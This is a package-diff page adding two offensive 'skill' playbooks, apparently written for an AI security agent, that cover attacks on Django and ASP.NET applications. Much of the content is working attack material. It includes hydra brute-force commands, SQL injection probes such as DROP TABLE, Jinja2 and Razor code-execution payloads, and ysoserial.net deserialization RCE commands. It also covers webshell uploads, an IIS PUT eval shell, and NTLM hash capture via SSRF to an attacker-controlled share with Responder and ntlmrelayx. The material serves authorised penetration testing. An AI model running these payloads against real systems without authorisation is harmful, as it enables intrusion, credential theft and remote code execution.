npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.1 - Mend

@aegis-scan/skills 0.5.0 → 0.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (346) hide show

package/skills/offensive/airecon-fork/frameworks-django/SKILL.md ADDED Viewed

@@ -0,0 +1,268 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: django
+description: Security testing playbook for Django applications covering debug mode, admin exposure, ORM injection, CSRF, SSTI, and Django-specific misconfigurations
+---
+# Django Security Testing
+Django is the most common Python web framework. Attack surface spans the admin panel, ORM queries, template engine, session/CSRF handling, and common misconfigurations like DEBUG=True in production.
+---
+## Reconnaissance
+### Fingerprinting Django
+    # Django-specific URLs and paths
+    GET /admin/                     # Admin panel (very common)
+    GET /admin/login/               # Admin login page
+    GET /static/admin/              # Django admin static files
+    GET /api/schema/                # DRF schema (if Django REST Framework used)
+    GET /api/swagger/               # Swagger UI
+    GET /api/redoc/                 # ReDoc
+    GET /__debug__/                 # Django Debug Toolbar (dev only)
+    GET /silk/                      # Django Silk profiler
+    # Error pages reveal Django version
+    GET /nonexistent-path-12345     # 404 — check for Django branding
+    POST /any-form-without-token    # 403 Forbidden with CSRF error reveals Django
+    # Headers
+    X-Powered-By: Django (sometimes)
+    Server: gunicorn / uvicorn
+---
+## Debug Mode (Critical)
+DEBUG=True leaks: full stack traces with local variables, settings (including SECRET_KEY), installed apps, URL patterns, SQL queries.
+    # Trigger a 500 error to see debug page
+    GET /any-existing-url?param=<invalid-type>
+    # Check for Django Debug Toolbar
+    GET /?djdt=show
+    GET /static/debug_toolbar/js/toolbar.js   # Confirms DDT installed
+**Impact:** SECRET_KEY exposure = cookie/session forgery, CSRF bypass, password reset link prediction.
+---
+## Django Admin Panel
+### Discovery
+    # Common paths
+    /admin/
+    /django-admin/
+    /backend/admin/
+    /panel/admin/
+    /manage/
+    # Enumerate apps from admin interface (visible after login)
+    # Brute-force admin credentials
+    hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form \
+      "/admin/login/:username=^USER^&password=^PASS^&csrfmiddlewaretoken=<token>:Please enter the correct"
+### Admin Panel Attacks
+    # CSRF token extraction for brute force
+    curl -c cookies.txt -s <target>/admin/login/ | grep csrfmiddlewaretoken
+    # Mass action exposure: check for bulk delete/update actions
+    # Custom ModelAdmin views may have IDOR or missing permission checks
+    # Admin object history reveals internal IDs
+    GET /admin/<app>/<model>/<id>/history/
+---
+## SQL Injection via Django ORM
+Django ORM protects against raw SQLi but raw queries exist:
+    # Dangerous patterns in Django code:
+    Model.objects.raw("SELECT * FROM table WHERE id = %s" % user_input)  # Vulnerable
+    Model.objects.extra(where=["id = %s" % user_input])                   # Vulnerable
+    cursor.execute("SELECT * FROM table WHERE id = " + user_input)         # Vulnerable
+    # Safe (parameterized):
+    Model.objects.raw("SELECT * FROM table WHERE id = %s", [user_input])   # Safe
+### Testing for Raw Query Injection
+    # Standard SQLi probes on all parameters
+    ' OR '1'='1
+    ' OR 1=1--
+    1 AND SLEEP(5)--
+    1; DROP TABLE users--
+    # Django ORM filter injection (lookups)
+    # Vulnerable: Model.objects.filter(**user_dict)
+    # Probe: ?field__class__=<injection>  (not common but test)
+---
+## Template Injection (SSTI)
+Django templates have limited SSTI (no eval by default) but Jinja2 is sometimes used:
+    # Django template engine (limited)
+    {{7*7}}                 # Won't execute — Django escapes this
+    {% debug %}             # If allowed, dumps context variables (info disclosure)
+    # Jinja2 templates (if configured)
+    {{7*7}}                                    # 49 — confirms Jinja2
+    {{config}}                                 # Django settings exposure
+    {{request.META.HTTP_HOST}}                 # Server-side request info
+    {{cycler.__init__.__globals__['os'].popen('id').read()}}  # RCE
+    # Identify template engine first:
+    {{7*'7'}}   # Returns 49 = Jinja2 | Returns 7777777 = Twig | Error = Django
+---
+## CSRF
+    # Django CSRF checks:
+    # - Checks Origin/Referer header on HTTPS
+    # - Requires csrfmiddlewaretoken in POST body OR X-CSRFToken header
+    # - Uses cookie-to-header pattern by default
+    # Bypass attempts:
+    # 1. Remove CSRF token entirely (if @csrf_exempt on view)
+    # 2. Change method: POST → GET (if view accepts both)
+    # 3. Content-type switch: application/json (CSRF exempt in some setups)
+    # 4. Origin: null (sandboxed iframe)
+    # 5. Subdomain takeover → same-site bypass
+---
+## Authentication & Session
+    # Django session cookie: sessionid (HttpOnly, sometimes missing Secure/SameSite)
+    # Check cookie attributes:
+    curl -I <target> | grep -i set-cookie
+    # Session fixation: test if session ID changes on login
+    # 1. Get session cookie pre-login
+    # 2. Login
+    # 3. Check if sessionid changes
+    # Password reset token analysis
+    # Django uses HMAC-based tokens: <uid>-<timestamp>-<hash>
+    # If SECRET_KEY is known (from DEBUG=True), tokens can be forged
+    # Account enumeration via password reset timing
+    POST /accounts/password/reset/   body: email=test@example.com
+    # Response time difference reveals valid vs invalid emails
+---
+## Sensitive Endpoints
+    # Django REST Framework
+    GET /api/                        # Browsable API root (lists all endpoints)
+    GET /api/?format=json            # Force JSON response
+    GET /api/users/                  # User list (check auth)
+    OPTIONS /api/<endpoint>/         # Returns allowed methods + serializer fields
+    # Common DRF auth endpoints
+    POST /api/auth/login/
+    POST /api/auth/token/
+    POST /api/token/
+    GET  /api/token/refresh/
+    # Django Channels (WebSocket)
+    ws://<target>/ws/
+    ws://<target>/ws/chat/
+---
+## File Upload
+    # Django FileField/ImageField
+    # Test: content-type bypass, filename traversal, extension bypass
+    Content-Disposition: form-data; name="file"; filename="shell.php"
+    Content-Type: image/jpeg
+    [PHP webshell content]
+    # Path traversal in filename
+    filename="../../settings.py"
+    filename="%2e%2e%2fsettings.py"
+    # MEDIA_URL exposure: check if uploads are served without auth
+    GET /media/uploads/<filename>
+---
+## Information Disclosure
+    # .env files (common in Django deployments)
+    GET /.env
+    GET /config/.env
+    # settings.py exposure (source code misconfig)
+    GET /settings.py
+    GET /app/settings.py
+    # Django secret files
+    GET /db.sqlite3           # SQLite database exposed
+    GET /requirements.txt     # Reveals package versions + framework info
+    GET /Pipfile
+    GET /Pipfile.lock
+    # Git exposure
+    GET /.git/config
+    GET /.git/HEAD
+---
+## Django-Specific Vulnerabilities
+### Mass Assignment (DRF)
+    # DRF Serializer without read_only fields
+    # If serializer has no read_only_fields, extra POST fields may be accepted
+    POST /api/users/profile/
+    {"username": "user", "is_staff": true, "is_superuser": true}
+### Open Redirect
+    # Django's next parameter in login redirect
+    GET /login/?next=https://evil.com
+    GET /accounts/login/?next=//evil.com
+    GET /accounts/login/?next=///evil.com
+### Insecure Direct Object Reference
+    # Django URL patterns with integer PKs
+    GET /api/users/1/
+    GET /api/users/2/
+    # Check if auth enforces ownership
+---
+## Key Tools
+    nuclei -t django -u <target>                    # Django-specific templates
+    dirsearch -u <target> -e py,django,db           # Path discovery
+    wfuzz -u <target>/admin/FUZZ/ -w wordlist.txt   # Admin path enumeration
+---
+## Pro Tips
+1. Always check `/admin/` — Django ships it enabled by default
+2. DEBUG=True exposes SECRET_KEY in error pages → forge sessions, CSRF tokens, password reset links
+3. Django REST Framework browsable API at `/api/` leaks full endpoint structure
+4. Check `MEDIA_ROOT` serving — uploaded files often accessible without auth
+5. DRF `ModelViewSet` with `permission_classes = []` = unauthenticated access
+6. `{% debug %}` template tag in templates dumps entire context (info disclosure)
+7. Password reset tokens expire after 3 days by default — check `PASSWORD_RESET_TIMEOUT`
+## Summary
+Django testing = admin panel + DEBUG mode + DRF API enumeration + ORM raw query injection. The admin panel and DEBUG=True are the fastest critical finds. DRF APIs often have authorization gaps (missing permission_classes, IDOR via integer PKs, mass assignment via serializer fields).

package/skills/offensive/airecon-fork/frameworks-dotnet/SKILL.md ADDED Viewed

@@ -0,0 +1,280 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: dotnet
+description: Security testing playbook for ASP.NET / .NET Core applications covering ViewState deserialization, Razor SSTI, NTLM auth bypass, IIS misconfigurations, and .NET-specific attack techniques
+---
+# ASP.NET / .NET Core Security Testing
+.NET is dominant in enterprise environments. Attack surface: ViewState deserialization (RCE without auth if machineKey is weak), Razor SSTI, NTLM credential capture, IIS misconfigurations, and .NET-specific deserialization gadget chains.
+---
+## Reconnaissance
+### Fingerprinting ASP.NET
+    # Response headers (often reveal framework and version)
+    X-Powered-By: ASP.NET
+    X-AspNet-Version: 4.0.30319
+    X-AspNetMvc-Version: 5.2
+    # ASP.NET Core (newer):
+    # No X-Powered-By by default, but:
+    # Server: Microsoft-IIS/10.0  → IIS = likely .NET
+    # .aspx, .ashx, .asmx file extensions
+    # Common .NET paths:
+    GET /elmah.axd              # Error log viewer (CRITICAL if exposed)
+    GET /trace.axd              # ASP.NET trace viewer (request details)
+    GET /ScriptResource.axd     # Script resource handler
+    GET /WebResource.axd        # Web resource handler
+    GET /api/                   # ASP.NET Core Web API
+    GET /swagger/               # Swagger UI
+    GET /swagger/index.html
+    GET /_framework/blazor.server.js    # Blazor server-side
+    GET /signalr/               # SignalR WebSocket hub
+    GET /hangfire               # Hangfire job dashboard
+    GET /health                 # Health check endpoint
+    GET /metrics                # Prometheus metrics
+    # Webconfig exposure (CRITICAL if accessible):
+    GET /web.config             # ASP.NET configuration (connection strings, machineKey)
+    GET /web.config.bak
+    GET /appsettings.json       # .NET Core config
+    GET /appsettings.Development.json
+    GET /appsettings.Production.json
+---
+## ViewState Deserialization (ASP.NET WebForms)
+ViewState is base64-encoded state stored in `__VIEWSTATE` hidden field. If MAC validation is disabled or machineKey is weak → RCE.
+    # Step 1: Check if MAC validation is enabled:
+    # Extract __VIEWSTATE from page source
+    # Try sending request with modified __VIEWSTATE — if accepted = MAC validation off
+    # Step 2: If machineKey is in web.config (leaked):
+    <machineKey validationKey="AAAA..." decryptionKey="BBBB..." validation="SHA1" decryption="AES" />
+    # Step 3: Generate RCE payload using ysoserial.net:
+    # https://github.com/pwntester/ysoserial.net
+    # ViewState payload (MAC enabled, needs machineKey):
+    ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami > C:\windows\temp\out.txt" \
+      --validationalg="SHA1" --validationkey="AAAA..." --decryptionalg="AES" \
+      --decryptionkey="BBBB..." --islegacy
+    # ViewState payload (MAC disabled):
+    ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --islegacy --isdebug
+    # Submit crafted __VIEWSTATE in POST body
+    # Find machineKey in common locations:
+    GET /web.config
+    GET /App_Data/web.config
+    # Or via SSRF/LFI
+---
+## .NET Deserialization
+    # Generate gadget chain payloads with ysoserial.net:
+    # Windows: ysoserial.exe | Linux: mono ysoserial.exe
+    # Available formatters: BinaryFormatter, LosFormatter, ObjectStateFormatter,
+    #                       NetDataContractSerializer, SoapFormatter, XML, JSON
+    # BinaryFormatter gadget (most common):
+    ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c whoami"
+    ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "cmd /c whoami"
+    # JSON.NET deserialization (common in Web API):
+    ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "cmd /c whoami"
+    # Payload injected into any JSON field that accepts polymorphic objects
+    # SOAP/ASMX endpoints:
+    ysoserial.exe -f SoapFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c whoami"
+    # Detect deserialization: look for AAEAAAD/ prefix in base64 = BinaryFormatter
+    # Look for binary data in cookies, hidden fields, API responses
+---
+## Razor SSTI (ASP.NET MVC / Razor Pages)
+    # Razor is not a template engine in the traditional sense
+    # But if user input reaches @Html.Raw() or dynamic template rendering:
+    # Detection probes (Razor expressions):
+    @(7*7)                      # Outputs 49
+    @{var x=7*7;}@x             # Also outputs 49
+    # If Razor code injection (very rare, needs unsanitized eval):
+    @{System.Diagnostics.Process.Start("cmd.exe", "/c whoami > C:\\temp\\out.txt")}
+    # More common: XSS via @Html.Raw():
+    @Html.Raw(userInput)        # XSS if input not sanitized
+    # vs safe: @userInput or @Html.Encode(userInput)
+    # Blazor Server-Side: check WebSocket for exposed component state
+---
+## NTLM Authentication Attacks
+IIS with Windows Authentication exposes NTLM hashes:
+    # Detect NTLM auth:
+    curl -I <target>
+    # WWW-Authenticate: NTLM → NTLM auth enabled
+    # WWW-Authenticate: Negotiate → Kerberos/NTLM
+    # Capture NTLM hash via Responder (if SSRF → internal NTLM auth endpoint):
+    responder -I eth0
+    # Trigger SSRF to internal Windows share → NTLM capture:
+    POST /ssrf-endpoint
+    url=\\\\attacker-ip\\share
+    # NTLM relay attack (if SSRF to internal UNC path):
+    impacket-ntlmrelayx -tf targets.txt -smb2support
+    # Identify NTLM-authenticated endpoints:
+    curl -v http://<target>/auth-endpoint 2>&1 | grep -i "NTLM\|Negotiate\|401"
+---
+## IIS Misconfigurations
+    # Short filename enumeration (IIS 6.x legacy):
+    # IIS creates 8.3 short filenames accessible via tilde (~)
+    GET /backup~1/       # Tests if backup directory exists
+    GET /web~1.con       # web.config short name
+    # IIS scanner tools:
+    # https://github.com/irsdl/IIS-ShortName-Scanner
+    java -jar iis_shortname_scanner.jar 2 20 http://<target>/
+    # HTTP methods exposure:
+    OPTIONS /  HTTP/1.1   # Check for PUT, DELETE, TRACE
+    # PUT enabled = arbitrary file upload to web root
+    # IIS PUT file upload (rare but still found):
+    curl -X PUT <target>/shell.asp --data "<%eval request(chr(35))%>"
+    # WebDAV (if enabled):
+    curl -X PROPFIND <target>/ -H "Depth: 1"
+    # IIS Unicode bypass (old IIS 4/5):
+    GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+    # ASP Classic file extensions:
+    GET /default.asp
+    GET /index.asp
+    GET /admin.asp
+---
+## Elmah / Diagnostic Endpoints
+    # ELMAH (Error Logging Modules and Handlers) — extremely common exposure
+    GET /elmah.axd                      # Error log with full exception details
+    GET /elmah.axd?asyncMode=true
+    GET /elmah.axd?type=download        # Download entire error log
+    # elmah.axd reveals:
+    # - Connection strings (db passwords)
+    # - Full stack traces with variable values
+    # - Internal IP addresses, file paths
+    # - Request data including cookies, POST bodies
+    # Other diagnostic endpoints:
+    GET /trace.axd                      # Full request trace (headers, session, form data)
+    GET /diagnostics
+    GET /admin/diagnostics
+---
+## appsettings.json Exposure (.NET Core)
+    # .NET Core config files (JSON, not XML)
+    GET /appsettings.json
+    GET /appsettings.Development.json
+    GET /appsettings.Staging.json
+    # Contents: connection strings, JWT secrets, API keys, service URLs
+    {
+      "ConnectionStrings": {
+        "DefaultConnection": "Server=...;Password=..."
+      },
+      "Jwt": {
+        "Secret": "super_secret_key_here"
+      }
+    }
+---
+## SignalR / WebSocket
+    # SignalR hub endpoints:
+    GET /signalr/negotiate?clientProtocol=1.5&connectionData=...
+    ws://<target>/signalr?...
+    # Hub method injection (if input reflected in hub method name):
+    # SignalR hubs may have authorization gaps — test all hub methods
+    # Blazor Server: client ↔ server circuit communication via WebSocket
+    # All component state transmitted — check for IDOR in component parameters
+---
+## Entity Framework SQL Injection
+    # EF Core parameterizes by default, but raw queries exist:
+    # Vulnerable:
+    context.Database.ExecuteSqlRaw($"SELECT * FROM Users WHERE Name = '{name}'")
+    context.Users.FromSqlRaw($"SELECT * FROM Users WHERE Id = {id}")
+    # Safe:
+    context.Users.FromSqlInterpolated($"SELECT * FROM Users WHERE Id = {id}")
+    context.Database.ExecuteSqlInterpolated($"DELETE FROM Users WHERE Id = {id}")
+    # LINQ injection via dynamic expressions (rare):
+    # If using Dynamic LINQ library with user-controlled sort/filter strings
+---
+## Common CVEs
+| CVE | Product | Impact |
+|-----|---------|--------|
+| CVE-2019-0604 | SharePoint | RCE via deserialization |
+| CVE-2021-31166 | IIS HTTP.sys | RCE (remote heap overflow) |
+| CVE-2017-9248 | Telerik UI | Crypto bypass → file upload |
+| CVE-2019-18935 | Telerik UI | RCE via deserialization |
+| CVE-2014-6287 | HFS (HTTP File Server) | RCE |
+    # Telerik Reporting / UI for ASP.NET (extremely common):
+    GET /Telerik.Web.UI.WebResource.axd?type=rau    # Check version
+    # CVE-2019-18935: Deserialize via RadAsyncUpload
+    nuclei -t cves/2019/CVE-2019-18935.yaml -u <target>
+---
+## Pro Tips
+1. `elmah.axd` exposed = instant critical — reveals connection strings, cookies, full errors
+2. ViewState MAC validation off (check via `EnableEventValidation=false`) = RCE with ysoserial.net
+3. `machineKey` in `web.config` + ViewState = RCE even with MAC validation enabled
+4. `appsettings.json` exposure is the .NET Core equivalent of Laravel's `.env`
+5. NTLM via SSRF: force SSRF to `\\attacker\share` → capture NTLMv2 hash via Responder
+6. Telerik UI RadAsyncUpload (CVE-2019-18935) is common in corporate ASP.NET apps — always check
+7. IIS short filename tilde enumeration reveals hidden directories/files on Windows IIS
+## Summary
+ASP.NET testing = `elmah.axd` exposure + ViewState deserialization (ysoserial.net) + appsettings.json/web.config + NTLM auth capture. elmah.axd is the fastest critical win — it dumps the entire application error log including connection strings. ViewState RCE requires the machineKey (from web.config exposure) or MAC validation being disabled — ysoserial.net handles the payload generation. Telerik UI components are extremely common and have multiple critical CVEs — always fingerprint and check.